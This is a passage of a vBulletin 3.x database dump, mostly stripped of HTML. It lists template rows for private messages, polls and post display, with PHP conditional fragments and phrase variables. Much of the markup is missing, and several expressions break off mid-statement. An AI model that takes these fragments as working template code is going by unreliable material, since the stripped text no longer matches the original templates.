    \r\n $vbphrase[title] $sortarrow[title] / \r\n $vbphrase[sender] $sortarrow[sender]\r\n
    \r\n
    \r\n $vbphrase[no_messages_to_display]\r\n
    \r\n
    \r\n $vbphrase[selected_messages]:\r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$sortfilter\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[unread_message]\"  $vbphrase[unread_message]
    \"$vbphrase[read_message]\"  $vbphrase[read_message]
    \"$vbphrase[repliedto_message]\"  $vbphrase[repliedto_message]
    \"$vbphrase[forwarded_message]\"  $vbphrase[forwarded_message]
    \r\n
    \r\n $vbphrase[download_all_private_messages_as]:
    \r\n $vbphrase[xml] |\r\n $vbphrase[csv] |\r\n $vbphrase[text]\r\n
    $forumjump
    \r\n', 'template', 1223393656, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'), (1492, -1, 'pm_messagelistbit', '\r\n \\\"\\\"\r\n \".(($show[\'pmicons\']) ? (\"\".(($show[\'pmicon\']) ? (\"\\\"$pm[icontitle]\\\"\") : (\" \")).\"\") : (\"\")).\"\r\n \r\n \r\n
    \r\n $pm[sendtime]\r\n \".(($show[\'unread\']) ? (\"$userbit\") : (\"$userbit\")).\"\r\n
    \r\n\r\n \r\n \".(($show[\'pmcheckbox\']) ? (\"\") : (\"\")).\"\r\n', '\r\n \"\"\r\n \"$pm[icontitle]\" \r\n \r\n
    \r\n $pm[senddate]\r\n $pm[title]$pm[title]\r\n
    \r\n
    \r\n $pm[sendtime]\r\n $userbit$userbit\r\n
    \r\n\r\n \r\n \r\n', 'template', 1221578878, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1493, -1, 'pm_messagelistbit_ignore', '\r\n \r\n
    \r\n session->vars[\'sessionurl\'] . \"do=showpm&pmid=$pm[pmid]\\\">$vbphrase[view_message]\r\n \" . construct_phrase(\"$vbphrase[x_is_on_your_ignore_list]\", \"$pm[fromusername]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n
    \r\n \r\n \".(($show[\'pmcheckbox\']) ? (\"\") : (\"\")).\"\r\n', '\r\n \r\n
    \r\n $vbphrase[view_message]\r\n $vbphrase[x_is_on_your_ignore_list]\r\n
    \r\n \r\n \r\n', 'template', 1221578903, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1494, -1, 'pm_messagelistbit_user', 'session->vars[\'sessionurl\'] . \"u=$userid\';\\\">$username', '$username', 'template', 1205932165, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'), (1495, -1, 'pm_messagelist_periodgroup', '\r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \\\"\\\"\r\n  \r\n $groupname\r\n
    \r\n \r\n \r\n \r\n\r\n\r\n $messagelistbits\r\n', '\r\n \r\n 32
    \" style=\"padding-top:3px; padding-bottom:3px; border-bottom:1px outset; cursor:pointer;\" ondblclick=\"toggle_collapse(\'pmf$groupid\')\" width=\"100%\">\r\n
    \r\n \r\n \r\n \r\n \"\"\r\n  \r\n $groupname\r\n
    \r\n \r\n \r\n \r\n\r\n\r\n $messagelistbits\r\n', 'template', 1223906167, 'vBulletin Solutions', '3.8.0 Beta 2', 'vbulletin'), (1496, -1, 'pm_movepm', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[move_private_messages]
    \r\n
    \r\n
    \r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[move_x_items_from_y]\", \"$totalmessages\", \"$fromfolder\") . \"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[select_destination_folder_for_move]
    \r\n $vbphrase[folder_name]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[move_private_messages]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[move_x_items_from_y]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[select_destination_folder_for_move]
    \r\n $vbphrase[folder_name]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208876563, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1497, -1, 'pm_newpm', '
    \r\n\r\n$postpreview\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[post_new_private_message]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[recipients]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    $vbphrase[recipient_usernames]
    \r\n
    \r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'sendmultiple\']) ? (\"\r\n [$vbphrase[bcc]]\r\n $vbphrase[bcc] $vbphrase[recipient_usernames]
    \r\n
    \r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \") : (\"\")).\"\r\n \") : (\"\")).\"\r\n
    \r\n \".(($show[\'sendmax\']) ? (\"
    \" . construct_phrase(\"$vbphrase[may_send_to_x_people]\", \"$permissions[pmsendmax]\") . \"
    \") : (\"\")).\"\r\n \".(($show[\'sendmultiple\']) ? (\"
    $vbphrase[separate_multiple_names]
    \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]:
      \\\"$selectedicon[alt]\\\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'receivepmbuddies\']) ? (\"\r\n
    \r\n $vbphrase[pm_non_contacts_heading]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \" . construct_phrase(\"$vbphrase[pm_non_contact_option_description]\", \"\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"\") . \"
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($show[\'trackpm\']) ? (\"
    \") : (\"\")).\"\r\n
    \r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'signature\']) ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$forumrules', '
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(this.title.value, 0)\">\r\n\r\n$postpreview\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[post_new_private_message]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[recipients]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    $vbphrase[recipient_usernames]
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n [$vbphrase[bcc]]\r\n $vbphrase[bcc] $vbphrase[recipient_usernames]
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[may_send_to_x_people]
    \r\n
    $vbphrase[separate_multiple_names]
    \r\n
    \r\n
    \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]:
      \"$selectedicon[alt]\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[pm_non_contacts_heading]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[pm_non_contact_option_description]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$forumrules', 'template', 1212142724, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1498, -1, 'pm_nomessagehistory', '\r\n\r\n \r\n\r\n
    \r\n $vbphrase[no_message_history]\r\n
    ', '\r\n\r\n \r\n\r\n
    \r\n $vbphrase[no_message_history]\r\n
    ', 'template', 1226500884, 'vBulletin Solutions', '3.8.0 Beta 3', 'vbulletin'), (1499, -1, 'pm_popup_script', '', '', 'template', 1125409057, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'), (1500, -1, 'pm_quickreply', '\".(($show[\'editor_toolbar\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \".(($show[\'basic_bbcode\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'color_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\'] OR $show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'quote_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \".((is_browser(\'ie\')) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'wysiwyg_compatible\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \\\"$vbphrase[remove_text_formatting]\\\"
    \\\"\\\"
    \\\"$vbphrase[bold]\\\"
    \\\"$vbphrase[italic]\\\"
    \\\"$vbphrase[underline]\\\"
    \\\"\\\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \\\"\\\"
    options[\'cleargifurl\'] . \"\\\" id=\\\"{$editorid}_color_bar\\\" alt=\\\"\\\" style=\\\"background-color:black\\\" width=\\\"21\\\" height=\\\"4\\\" />
    \\\"\\\"
    \r\n
    \\\"\\\"
    \\\"$vbphrase[insert_link]\\\"
    \\\"$vbphrase[insert_image]\\\"
    \\\"\\\"
    \\\"$vbphrase[wrap_quote_tags]\\\"
     
    \\\"$vbphrase[check_spelling]\\\"
    \r\n
    \\\"$vbphrase[decrease_size]\\\"
    \r\n
    \\\"$vbphrase[increase_size]\\\"
    \r\n
    \\\"$vbphrase[switch_editor_mode]\\\"
    \r\n
    \r\n\") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n\r\n\r\nsession->vars[\'styleid\'] . \"\\\" />\r\n\r\n', '\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[remove_text_formatting]\"
    \"\"
    \"$vbphrase[bold]\"
    \"$vbphrase[italic]\"
    \"$vbphrase[underline]\"
    \"\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \"\"
    \"\"
    \"\"
    \r\n
    \"\"
    \"$vbphrase[insert_link]\"
    \"$vbphrase[insert_image]\"
    \"\"
    \"$vbphrase[wrap_quote_tags]\"
     
    \"$vbphrase[check_spelling]\"
    \r\n
    \"$vbphrase[decrease_size]\"
    \r\n
    \"$vbphrase[increase_size]\"
    \r\n
    \"$vbphrase[switch_editor_mode]\"
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n\r\n\r\n\r\n\r\n', 'template', 1214911577, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1501, -1, 'pm_receipts', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n$receiptbits\r\n\r\n \r\n\r\n\r\n
    \r\n \\\"\\\"\r\n $tabletitle ($numreceipts)\r\n
    $vbphrase[message]$vbphrase[sent_date]$vbphrase[read_date]
    \r\n\r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n$receiptbits\r\n\r\n \r\n\r\n\r\n
    \r\n \"\"\r\n $tabletitle ($numreceipts)\r\n
    $vbphrase[message]$vbphrase[sent_date]$vbphrase[read_date]
    \r\n\r\n
    \r\n\r\n
    ', 'template', 1208876586, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1502, -1, 'pm_receiptsbit', '\r\n \r\n $receipt[send_date] $receipt[send_time]\r\n \".(($show[\'readpm\']) ? (\"$receipt[read_date] $receipt[read_time]\") : (\"$vbphrase[unread_date]\")).\"\r\n \r\n', '\r\n \r\n $receipt[send_date] $receipt[send_time]\r\n $receipt[read_date] $receipt[read_time]$vbphrase[unread_date]\r\n \r\n', 'template', 1137198627, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'), (1503, -1, 'pm_showpm', '\".(($show[\'receiptprompt\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\".(($show[\'recipients\']) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n
    \r\n
    \r\n \".(($show[\'reportlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=report&pmid=$pm[pmid]\\\" rel=\\\"nofollow\\\">\\\"$vbphrase[report_bad_private_message]\\\"  \") : (\"\")).\"\r\n
    \r\n $vbphrase[private_message]: $pm[original_title]\r\n
    \".(($ccrecipients) ? (\"$vbphrase[recipients]: $ccrecipients
    \") : (\"\")).\"\".(($bccrecipients) ? (\"$vbphrase[recipients] ($vbphrase[bcc]): $bccrecipients\") : (\"\")).\"
    \r\n\r\n$postbit\r\n\r\n
    \r\n\r\n\".(($show[\'receiptprompt\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[confirm_outstanding_receipt]
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    \" . construct_phrase(\"$vbphrase[x_requested_read_receipt]\", \"$pm[fromusername]\") . \"\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickreply\']) ? (\"\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[quick_reply]\r\n
    \r\n $vBeditTemplate[clientscript]\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[message]:
    \r\n
    $messagearea
    \r\n \".(($allowed_bbcode) ? (\"
    $allowed_bbcode
    \") : (\"\")).\"\r\n
    \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\".(($pm[\'parentpmid\']) ? (\"\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[message_history]\r\n \r\n
    \r\n
    \r\n$threadpms\r\n
    \r\n\r\n\r\n\r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[delete_this_message]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[delete_message]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[delete_message_click_button]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n
    \r\n \"$vbphrase[report_bad_private_message]\"  \r\n
    \r\n $vbphrase[private_message]: $pm[original_title]\r\n
    $vbphrase[recipients]: $ccrecipients
    $vbphrase[recipients] ($vbphrase[bcc]): $bccrecipients
    \r\n\r\n$postbit\r\n\r\n
    \r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[confirm_outstanding_receipt]
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[x_requested_read_receipt]\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[quick_reply]\r\n
    \r\n $vBeditTemplate[clientscript]\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, 0)\">\r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[message]:
    \r\n
    $messagearea
    \r\n
    $allowed_bbcode
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[message_history]\r\n \r\n
    \r\n
    \r\n$threadpms\r\n
    \r\n\r\n\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[delete_this_message]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[delete_message]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[delete_message_click_button]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1249925831, 'vBulletin Solutions', '3.8.4', 'vbulletin'), (1504, -1, 'pm_trackpm', '\".(($show[\'receipts\']) ? (\"\r\n$confirmedreceipts\r\n\r\n\".(($confirmed_pagenav) ? (\"$confirmed_pagenav
    \") : (\"\")).\"\r\n\r\n$unconfirmedreceipts\r\n$unconfirmed_pagenav\r\n\") : (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[message_tracking]\r\n
    \r\n
    \r\n $vbphrase[not_tracking_any_messages]\r\n
    \r\n
    \r\n
    \r\n\")).\"', '\r\n$confirmedreceipts\r\n\r\n$confirmed_pagenav
    \r\n\r\n$unconfirmedreceipts\r\n$unconfirmed_pagenav\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[message_tracking]\r\n
    \r\n
    \r\n $vbphrase[not_tracking_any_messages]\r\n
    \r\n
    \r\n
    \r\n
    ', 'template', 1224683653, 'vBulletin Solutions', '3.8.0 Beta 2', 'vbulletin'), (1505, -1, 'polleditbit', '\r\n \r\n \r\n', '\r\n \r\n \r\n', 'template', 1070083596, 'vBulletin Solutions', '', 'vbulletin'), (1506, -1, 'pollnewbit', '\r\n \r\n\r\n', '\r\n \r\n\r\n', 'template', 1070083614, 'vBulletin Solutions', '', 'vbulletin'), (1507, -1, 'polloption', '
    \r\n', '
    \r\n', 'template', 1069784992, 'vBulletin Solutions', '', 'vbulletin'), (1508, -1, 'polloptions_table', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\".(($show[\'pollenddate\']) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'editpoll\']) ? (\"session->vars[\'sessionurl\'] . \"do=polledit&pollid=$pollinfo[pollid]\\\">$vbphrase[edit_poll]\") : (\"\")).\"\r\n $vbphrase[poll]: $pollinfo[question]\r\n
    \" . construct_phrase(\"$vbphrase[this_poll_will_close_on_x_at_y]\", \"$pollenddate\", \"$pollendtime\") . \"
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'publicwarning\']) ? (\"\r\n
    $vbphrase[public_poll_users_see_choices]
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[poll_options]\r\n
    \r\n
    $pollinfo[question]
    \r\n $pollbits\r\n
    \r\n
    \r\n\r\n \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[edit_poll]\r\n $vbphrase[poll]: $pollinfo[question]\r\n
    $vbphrase[this_poll_will_close_on_x_at_y]
    \r\n
    \r\n
    \r\n\r\n \r\n
    $vbphrase[public_poll_users_see_choices]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[poll_options]\r\n
    \r\n
    $pollinfo[question]
    \r\n $pollbits\r\n
    \r\n
    \r\n\r\n \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    ', 'template', 1208876587, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1509, -1, 'polloption_multiple', '
    \r\n', '
    \r\n', 'template', 1069785015, 'vBulletin Solutions', '', 'vbulletin'), (1510, -1, 'pollpreview', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[poll_preview]
    \r\n

    $previewquestion

    \r\n
    $vbphrase[options]:
    $pollpreviewbits
    \r\n
    \r\n\r\n
    \r\n', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[poll_preview]
    \r\n

    $previewquestion

    \r\n
    $vbphrase[options]:
    $pollpreviewbits
    \r\n
    \r\n\r\n
    \r\n', 'template', 1070526896, 'vBulletin Solutions', '', 'vbulletin'), (1511, -1, 'pollresult', '\r\n \r\n \".(($option[\'uservote\']) ? (\"\r\n $option[question]\r\n \") : (\"\r\n $option[question]\r\n \")).\"\r\n \".(($show[\'pollvoters\']) ? (\"
    $names
    \") : (\"\")).\"\r\n \r\n \r\n \\\"\\\"\\\"\\\"\\\"\\\"options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"$option[remainder]\\\" height=\\\"10\\\" />\r\n \r\n $option[votes]\r\n $option[percent]%\r\n\r\n', '\r\n \r\n \r\n $option[question]\r\n \r\n $option[question]\r\n \r\n
    $names
    \r\n \r\n \r\n \"\"\"\"\"\"\"\"\r\n \r\n $option[votes]\r\n $option[percent]%\r\n\r\n', 'template', 1201278148, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'), (1512, -1, 'pollresults', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[view_poll_results]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$pollresults\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[view_poll_results]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$pollresults\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1195729862, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1513, -1, 'pollresults_table', '\r\n\r\n \r\n\r\n\".(($show[\'pollenddate\']) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n$pollbits\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'editpoll\']) ? (\"session->vars[\'sessionurl\'] . \"do=polledit&pollid=$pollinfo[pollid]\\\">$vbphrase[edit_poll]\") : (\"\")).\"\r\n $vbphrase[view_poll_results]: $pollinfo[question]\r\n
    \" . construct_phrase(\"$vbphrase[this_poll_will_close_on_x_at_y]\", \"$pollenddate\", \"$pollendtime\") . \"
    \".(($show[\'multiple\']) ? (\"$vbphrase[multiple_choice_poll] \") : (\"\")).\"$vbphrase[voters]: $pollinfo[numbervotes]. $pollstatus
    \r\n\r\n
    ', '\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n$pollbits\r\n\r\n \r\n\r\n
    \r\n $vbphrase[edit_poll]\r\n $vbphrase[view_poll_results]: $pollinfo[question]\r\n
    $vbphrase[this_poll_will_close_on_x_at_y]
    $vbphrase[multiple_choice_poll] $vbphrase[voters]: $pollinfo[numbervotes]. $pollstatus
    \r\n\r\n
    ', 'template', 1105552570, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'), (1514, -1, 'postbit', '$template_hook[postbit_start]\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n\r\n
    \r\n
    \r\n  \r\n \".(($show[\'postcount\']) ? (\"#session->vars[\'sessionurl\'] . \"p=$post[postid]&postcount=$post[postcount]\\\" target=\\\"new\\\" rel=\\\"nofollow\\\" id=\\\"postcount$post[postid]\\\" name=\\\"$post[postcount]\\\">$post[postcount]  \") : (\"\")).\"\r\n \".(($show[\'reputationlink\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"p=$post[postid]\\\" rel=\\\"nofollow\\\" id=\\\"reputation_$post[postid]\\\">\\\"\"\r\n \".(($show[\'popups\']) ? (\"\") : (\"\")).\" \r\n \") : (\"\")).\"\r\n \".(($show[\'infractionlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=report&p=$post[postid]\\\" rel=\\\"nofollow\\\">\\\"\"  \") : (\"\")).\"\r\n \".(($show[\'reportlink\']) ? (\"session->vars[\'sessionurl\'] . \"p=$post[postid]\\\" rel=\\\"nofollow\\\">\\\"$vbphrase[report_bad_post]\\\"  \") : (\"\")).\"\r\n $post[iplogged]\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n \r\n \\\"$post[statustitle]\\\"\r\n \".((!$show[\'announcement\']) ? (\"\r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\"\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[x_until_y]\", \"$post[startdate]\", \"$post[enddate]\") . \"\r\n \")).\"\r\n $post[firstnewinsert]\r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \".(($show[\'avatar\']) ? (\"\") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n
    session->vars[\'sessionurl\'] . \"u=$post[userid]\\\">\\\"\"\r\n\r\n
    \r\n \".(($show[\'profile\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$post[userid]\\\">$post[musername]\r\n $post[onlinestatus]\r\n \r\n \") : (\"\r\n $post[musername]\r\n \")).\"\r\n
    \r\n\r\n \".(($post[\'usertitle\']) ? (\"
    $post[usertitle]
    \") : (\"\")).\"\r\n \".(($post[\'rank\']) ? (\"
    $post[rank]
    \") : (\"\")).\"\r\n $template_hook[postbit_userinfo_left]\r\n\r\n
     \r\n\r\n
    \r\n \".(($post[\'joindate\']) ? (\"
    $vbphrase[join_date]: $post[joindate]
    \") : (\"\")).\"\r\n \".(($post[\'field2\']) ? (\"
    $vbphrase[location_perm]: $post[field2]
    \") : (\"\")).\"\r\n \".(($post[\'age\']) ? (\"
    $vbphrase[age]: $post[age]
